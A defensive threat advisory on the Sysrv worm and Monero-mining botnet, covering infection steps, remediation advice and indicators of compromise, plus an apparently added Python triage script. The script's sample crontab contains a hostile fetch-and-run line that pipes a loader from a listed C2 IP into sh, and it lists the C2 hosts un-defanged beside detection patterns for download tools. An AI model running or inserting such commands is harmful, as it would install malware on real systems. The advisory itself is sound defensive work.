Sysrv Botnet

Sysrv is a Go-based worm and botnet which targets exposed Windows and Linux-based servers. Devices enrolled into Sysrv's botnet are then used to mine the Monero cryptocurrency.

Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

First observed in December 2020, Sysrv (also known as Sysrv-hello) is a worm and botnet written in the Go language. It scans the internet for exposed Windows and Linux servers, and attempts to exploit multiple vulnerabilities to gain access. Devices enrolled into Sysrv’s botnet are then used to mine the Monero cryptocurrency, whilst information is collected to facilitate lateral movement.


Delivery & activities

Sysrv's worm component scans the internet for vulnerable systems to enrol into its botnet, using exploits that target remote code execution (RCE) or injection vulnerabilities in a wide variety of web technologies. There is evidence that the set of exploits used for this is regularly updated through its command and control (C2) infrastructure. If exploitation succeeds, a loader script (ldr.sh on Linux, ldr.ps1 on Windows) is downloaded from a C2 server via wget, curl or PowerShell. The script prepares the target for the deployment of Sysrv by attempting to remove any existing cryptocurrency miners, terminating services, and modifying the system firewall (T1562.004).

The loader script also attempts lateral movement over SSH (T1021.004), trying private keys harvested from already-infected servers against other hosts. Once a new host is exploited, the loader script is downloaded there and the delivery process begins again. Note that not all variants of the loader script perform this lateral movement function.

The loader script then downloads Sysrv itself from the C2 server. Sysrv combines the worm and miner components in a single 64-bit binary. It maintains persistence by creating a scheduled task (a cron job on Linux) that re-executes Sysrv. It runs XMRig, a cryptocurrency miner that mines Monero, renamed to kthreaddi, a name chosen to resemble the kernel's kthreadd thread. The XMRig binary and its configuration file are deleted after execution (T1070.004), so the miner keeps running from a file that no longer exists on disk, and the loader script also removes it from the process list to evade detection on the host.


Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that the NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

Network indicators

IPs

  • 185[.]239.242.71
  • 194[.]145.227.21
  • 194[.]40.243.98
  • 195[.]58.39.46
  • 31[.]210.20.120
  • 31[.]210.20.181
  • 31[.]42.177.123
  • 45[.]145.185.85

Domains

  • finalshell[.]nl

URLs

  • http://185[.]239.242.71/ldr.ps1
  • http://185[.]239.242.71/ldr.sh
  • http://185[.]239.242.71/sysrv.exe
  • http://194[.]145.227.21/ldr.sh
  • http://194[.]145.227.21/sysrv
  • http://194[.]40.243.98/ldr.sh
  • http://195[.]58.39.46/asap
  • http://31[.]210.20.120/ldr.sh
  • http://31[.]210.20.120/sysrv.exe
  • http://31[.]210.20.120/sysrvv
  • http://31[.]210.20.181/ldr.sh
  • http://31[.]42.177.123/sysrv.exe
  • http://31[.]42.177.123/sysrvv
  • http://45[.]145.185.85/sysrv.exe
  • http://45[.]145.185.85/ldr.ps1
  • http://45[.]145.185.85/sysrv
  • http://finalshell[.]nl/sysrv.exe
  • http://finalshell[.]nl/sysrv

Host indicators

SHA256 hashes

  • 03e1806272242fae788c8728bc5796482890601839c0c5012855424ce253c95d
  • 064869b60b9cdb2b39daa30280770e63d9151fe3cc9f6db3813953cd71bdba8f
  • 0703482c9cfd573924c028db0a2563b7e936993a345ad6d92e9cff73030cebc5
  • 0783a9793100e6a32b21183239f955989c8901d18260092309efae91ccc075da
  • 0c13b3528088c308ac28971fba93939c66da2eabef66a4d3790c0b1817221535
  • 0f02a4180528a850cf24310f2e88c365695e35adbe6ba023288283599348b16d
  • 1384790107a5f200cab9593a39d1c80136762b58d22d9b3f081c91d99e5d0376
  • 15e0b4302902a425dcd0476a60a0d96a17c5a6cdd9fe13c2d09c5055e48178e4
  • 18a877f11f2ba2d7ae05ee8644a5cbd687282df4010dd0cb7680aec2e00d98ce
  • 1c91ed47c3c0baa74fa15c9b02330701dd02fc1e9b44963e1fe9a650ef7b78ef
  • 1d42661ed8ee86d6329d27158ba9d1cf6291b1d3c6554ba50b683643f0b89959
  • 1dd2c66843fcf5512b4dda518c2d5010edf06ab701f0380777b1b305ce9c98b0
  • 22ef90a2b3c23d3c890358fff4ec1210e4ceaaf46d8bef525294151b0e88ce15
  • 28dcdabaab2837b944a260048792ee4141ab0b3061637d7b9097706292c76877
  • 296d3d3ed5feeda7f6d99adc9da2566cb6c460194066acccac941a7b09bedfc3
  • 2d1b6deaccca69f67a6a207ecebb0010e62cd4d87298374c957236c78606f62e
  • 2d5de0dfa05c2a2649a4537b3f935f3ab2c029eeb3a07ab33592611388c845aa
  • 30c3965452d35eab07243e2b193a3de678c1be6719753ed00b164785ae57ea98
  • 3ea2df69b99f78fc0768ecf8190293f2b277b6de6e7b8e668f40b8a4910df17c
  • 41abb26f7c6dbc59ed4fc9f323211b4d422937700d866a7c5d12625f85fe6be6
  • 472fa4d13d8d71762af7fe5d574ad0d7c7c2983d228fd0944f0ee706e5b9d551
  • 4a588b7f30c91dd5603ffb0ea48cbd9f589f44b7fcb980b9bb9959d87dd344ad
  • 4fd37fa6ccf027e11409e3ca3b8109b2830cb3d7842303e67e6d0c087ae1b419
  • 5208cda8463eee0ac2cf0273dcd4036aa1e2be0de2c45b4ffd71e4c92bac3f2b
  • 544d20fc286d0803dee86a9c34b4c348333e320a4e33fd2730079701cb6e108f
  • 588b0838cc4c0fc64bfc1e5eeab2c9a59248e4e28a859ecbbac6bfe88bda703d
  • 58d96898ae28a806c8056799d703cad8a5bac95772458512395f77b8b6f73585
  • 5c902be344f9e089e60c36bbe3345fb5bd9c3c0b4cec349a6bb18da7faef0908
  • 5f5d599d4d0f9149440a6f813c6db3759d4fdbf7abe991c3af3aa59dc8c4027f
  • 6464434e5040b6bab0dd8b55b906dc1d068a21de5684e75e5eb51aa2608ef0ad
  • 6750e584ad0c21588e0add09c6ebe0cc9affe1673ac848b1761359170cf08bb7
  • 6a77d927c3e749c92b3f8847804c0de509050ad24aaf72519314df9226c3acb0
  • 6cab9f43cf738ba5ca9fb519f898f6ae10b11391d76191c395fe2c5bcbe5c100
  • 72483800c412e2204731b12c9d8fff1bc84f7af8f0b258299bb4f091a57ab23a
  • 73366b91ed479f3394fe2f211edac36df0e90d6be41b7ee0559582a324484e40
  • 752f181073449404df442a56b067951a8ed5a5419129ca5a416e80c376295b54
  • 774fad3fd2c7add5842b58c1127b9061d38027debcd3917910a8ec6b6aec9d08
  • 77a9f3d4f498c8a84e09c89fd75d98eea31954cc17d948b876c00c638c95a7b6
  • 7a546057a47ee02f6436e51d6d61f1b63c525307f9b5076a8edfe2cf4ae68769
  • 7ff5f2b3145d1e54a84f5bcc13ae6838baac2d6c20951d19608166833753d96f
  • 80bc76202b75201c740793ea9cd33b31cc262ef01738b053e335ee5d07a5ba96
  • 8223164dd8e2c7d6b2f0da63639186564335ba6a1bfc11cf31493d5c48f3abaf
  • 8353823b0dc71e1feec1a2ba5e509966d5dae7f5105489c1e628baa73b314d76
  • 848ed7e90c767e7ab2b1a93f9b8ca9c41eb02c3c76bf8b7dfd806fe26c1f431e
  • 8d0585970d1f6996ee8a034ee1f482bb0df32599e618312c0830e2fb04b6af5a
  • 8f421d90d2697cc38d24858ab894a119719a217157c151eaf9fe9ff55f6387a5
  • 934b422f0b8d26bd1c094bd532ddd947a702262c27991d757a9a6e3672014e98
  • 98e10d9c5bfd7a26ff3eb68d232109b6fbe0b0ec39f763f574301fb55e52a067
  • 9b2023a0e22f22860a7a46a67c9eba2c4831db66244603fd961fbb5c38b55272
  • 9c9b7da616239290db831a9305e1a46d45c112c761deaea5ed4c36aea7433891
  • 9d85b4e7202521d435a871b7de5f8affd30603687cf6e6f39f1420e9223b2bea
  • 9fd4fbab33dbedf48706096ab4ae19e25648f33d2e9fba62118fea726c918848
  • a41f2f0d431e750e911fc8f70c8b764f141f19fef2e6b0b70192d502d59ae39a
  • a999d7f95af4084b1e4276ee329e9b466c4d88a14cfc87007587d18a4a6c9f8a
  • ac0d8aceb01077b5ff3de02c6c63971054104bedabf3732ed169646a3f7e10e9
  • af279402867f3ef8d9e8bacde3aff359b1c6f3f2d581b914f12cb9d914199a0d
  • b480b65704fb998bafa8893221e691daa906a80206196eda1ac3c0cdcc5c1c49
  • b7e06689bde2614505a70cd0b4be24688be78d05057a134cc3f16919763bf65f
  • ba46915f06d99c4dbb9d07767a86e979893f46333a8a93fce6e040452dfc1155
  • bcb02047374196acdf0285a656a8d378cecd6115c403d0bc9f743b4e3ffd6fed
  • be8d067e762c5da8e616f62e882881b82c8627943bdf006e304fd9a4f784763f
  • beaa0639a67f7fc7937a100f01a550ecb8c8b608251f4d02a97d9a0a15de1304
  • bf2c450d4d3519de51fbd31def04a0e6786e13a568ddefcaa62d812cc72ffc4c
  • c07838598435a26f658654db4ce816914e6cfe70056382471362407d6093e1fa
  • c75c47694c5affa6c7eb4259ec3e4f29c740872305229b271e57bd90816e86b6
  • d42090b274d285e759de296239bd7b8e5d97270b2d2ae189aed80e68ba82b591
  • d50864f13378b333784f7469df98ef2ea438489ccf0649622897a7712a9c18f8
  • d8336694afc213433470e9481de2f5d3f57dbeaf5763f62d137be103f63c45dc
  • dd31b774397c6e22375d4f2fe26e38e82ae164bc73cf58314b18b8eed26802f0
  • dd5b4de5a1c68aad5a2efb08db55cb3e09f8ddffc19c95c1ecf9d06c6edf2d40
  • e51e35ce9737838d1a26be7285ba78a137d11c6725382944f34bde86f16cc893
  • e627aff93c1e095786b5a5248425ec62c1ea8b049d487cfa6e9cfdf2a0ddbd7b
  • f115f7826b7857be4522b84a17077a49d0ec0835010da31060acf85bab87778c
  • f36b692e27631a5cc96f705ad06fa4496b70fc59c4ed3b6f9a2efffff503975c
  • f4098b2e1e861baac736ea9e71c45e488330a3f7a799460f35573014e04152c0
  • f487b23309808e468889baf10c852284b7833b8ac06fd405d1b19abafc8e17fb
  • f674e83e44bbb3ddf76c3622b9b8b0be16edf60f4021a91b5959e528684c481f
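The behaviours described under Delivery & activities (loader fetched with wget, curl or PowerShell, cron/scheduled-task persistence, XMRig renamed to kthreaddi and deleted after launch) and the indicators listed above can be turned into a small host and network triage check. The following is an added example written for this page, not NHS Digital's tooling and not code from the botnet itself: it copies the page's network indicators and a subset of its SHA256 hashes into Python, classifies URLs against them, scans a crontab and a web-proxy log, and judges a process by its name and its /proc/PID/exe link target. The function names, the proxy log layout and all sample data are assumptions constructed for the dry run.

```python
"""Triage helpers for the Sysrv behaviours and indicators listed on this page.

Added example; not NHS Digital's or the botnet's own code. Apart from the
indicators copied from the page, the function names, log layout and sample
data are assumptions made for illustration.
"""
import re

# Network indicators copied from the page's IoC list (defanging removed).
SYSRV_C2_HOSTS = {
    "185.239.242.71", "194.145.227.21", "194.40.243.98", "195.58.39.46",
    "31.210.20.120", "31.210.20.181", "31.42.177.123", "45.145.185.85",
    "finalshell.nl",
}
# File names that appear in the page's URL list (loader scripts and payloads).
SYSRV_PAYLOAD_NAMES = {"ldr.sh", "ldr.ps1", "sysrv", "sysrv.exe", "sysrvv", "asap"}
# Subset of the page's SHA256 hashes; paste in the full list when deploying.
SYSRV_SHA256 = {
    "03e1806272242fae788c8728bc5796482890601839c0c5012855424ce253c95d",
    "064869b60b9cdb2b39daa30280770e63d9151fe3cc9f6db3813953cd71bdba8f",
    "0703482c9cfd573924c028db0a2563b7e936993a345ad6d92e9cff73030cebc5",
    "f674e83e44bbb3ddf76c3622b9b8b0be16edf60f4021a91b5959e528684c481f",
}
MINER_PROCESS_NAME = "kthreaddi"  # XMRig renamed to resemble the kernel's kthreadd

_URL = re.compile(r"""https?://([^/\s:'"]+)(?::\d+)?(/[^\s'"|;&]*)?""")
_DOWNLOADER = re.compile(r"\b(?:wget|curl|Invoke-WebRequest|iwr|DownloadString)\b", re.I)


def classify_url(url):
    """Return 'c2-host' for a listed IP/domain, 'payload-name' when only the
    requested file name matches (a lead, not a verdict), else None."""
    m = _URL.search(url)
    if not m:
        return None
    host, path = m.group(1).lower(), m.group(2) or ""
    if host in SYSRV_C2_HOSTS:
        return "c2-host"
    if path.rsplit("/", 1)[-1] in SYSRV_PAYLOAD_NAMES:
        return "payload-name"
    return None


def scan_crontab(text):
    """Flag crontab lines that fetch a Sysrv loader or payload: persistence
    re-launches Sysrv from cron and the loader is pulled with wget/curl, so an
    entry downloading from a listed host is a strong indicator.
    Returns [(line_number, reason, line), ...]."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        reason = classify_url(line)
        if reason == "c2-host" or (reason and _DOWNLOADER.search(line)):
            hits.append((n, reason, line.strip()))
    return hits


def scan_proxy_log(lines):
    """Flag proxy log lines whose URL matches; returns [(client, url, reason)].
    Assumed layout: '<timestamp> <client_ip> <method> <url> <status>'."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        reason = classify_url(parts[3])
        if reason:
            hits.append((parts[1], parts[3], reason))
    return hits


def process_is_suspect(comm, exe_link):
    """Judge one process from /proc/PID/comm and the /proc/PID/exe link target.
    exe_link is None for genuine kernel threads (readlink fails on them). A user
    process carrying the miner's name, or one whose binary was deleted after
    launch (T1070.004, as the page describes for XMRig), is worth pulling."""
    if comm == MINER_PROCESS_NAME:
        return "miner-process-name"
    if exe_link is not None and exe_link.endswith(" (deleted)"):
        return "running-from-deleted-binary"
    return None


def hash_is_known(sha256_hex):
    """Check a digest (e.g. from 'sha256sum') against the page's hash list."""
    return sha256_hex.strip().lower() in SYSRV_SHA256


# Constructed sample data for a dry run; not captured from a real infection.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
* * * * * wget -q -O - http://31.210.20.120/ldr.sh | sh
*/5 * * * * curl -fsSL https://internal.example/health > /dev/null
"""
SAMPLE_PROXY_LOG = [
    "2021-05-01T10:00:01Z 10.0.0.12 GET http://finalshell.nl/sysrv 200",
    "2021-05-01T10:00:02Z 10.0.0.13 GET https://www.example.org/index.html 200",
    "2021-05-01T10:00:03Z 10.0.0.14 GET http://203.0.113.9/ldr.ps1 200",
]
```

On a live Linux host, feed the output of `crontab -l` (for each user) and the files under /etc/cron* to scan_crontab, the contents of /proc/PID/comm and the target of `readlink /proc/PID/exe` to process_is_suspect, and `sha256sum` output to hash_is_known. A 'payload-name' match on its own is only a lead, since names like sysrv.exe or asap are not unique; a 'c2-host' match or a kthreaddi process running from a deleted binary is what warrants isolating the host.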

Last edited: 6 May 2021 1:03 pm